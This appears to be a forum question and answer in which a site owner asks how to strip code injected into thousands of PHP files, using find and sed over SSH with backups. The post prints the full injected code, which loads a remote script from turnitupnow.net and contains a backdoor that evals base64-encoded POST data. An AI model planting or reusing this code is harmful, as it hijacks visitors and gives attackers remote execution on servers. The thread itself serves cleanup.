I have to solve a code injection in my site, thousands of files are affected. The following code has been injected in all my PHP files
global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
How can find that string in the whole file structure, replace it for an empty string and keep a backup of those files? I have SSH access
UPDATE
I keep getting a -bash: syntax error near unexpected token<'` when using
find ./ -type f -name "*.php" | xargs sed -i.bckp 's/global \$sessdt_o; if\(\!\$sessdt_o\) { \$sessdt_o = 1; \$sessdt_k = \"lb11\"; if\(\!@\$_COOKIE\[\$sessdt_k\]\) { \$sessdt_f = \"102\"; if\(\!@headers_sent\(\)\) { @setcookie\(\$sessdt_k,\$sessdt_f\); \} else { echo \"<script>document.cookie=\'\".\$sessdt_k.\"=\".\$sessdt_f.\"\';<\/script>\"; \} \} else { if\(\$_COOKIE\[\$sessdt_k\]==\"102\"\) { \$sessdt_f = \(rand\(1000,9000\)+1\); if\(\!@headers_sent\(\)\) { @setcookie\(\$sessdt_k,\$sessdt_f\); \} else { echo \"<script>document.cookie=\'\".\$sessdt_k.\"=\".\$sessdt_f.\"\';<\/script>\"; \} \$sessdt_j = @\$_SERVER\[\"HTTP_HOST\"\].@\$_SERVER\[\"REQUEST_URI\"\]; \$sessdt_v = urlencode\(strrev\(\$sessdt_j\)\); \$sessdt_u = \"http:\/\/turnitupnow.net\/?rnd=\".\$sessdt_f.substr\(\$sessdt_v,-200\); echo \"<script src=\'\$sessdt_u\'><\/script>\"; echo \"<meta http-equiv=\'refresh\' content=\'0;url=http:\/\/\$sessdt_j\'><\!--\"; \} \} \$sessdt_p = \"showimg\"; if\(isset\(\$_POST\[\$sessdt_p\]\)\){eval\(base64_decode\(str_replace\(chr\(32\),chr\(43\),\$_POST\[\$sessdt_p\]\)\)\);exit;\} \}//g'
as suggested by @flesk
Am I escaping something wrong?
thanks
many thanks for your answers. I was solving this problem too and although as mentioned it has to be simplified to make it work, this alteration did the job prefectly as it's one line:
find /home/weby/zkouska -type f -name "*.php" | xargs sed -i.bckp 's/global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11";.*$//g'
hope this going to help anyone else solving this nasty hack
wahyaohni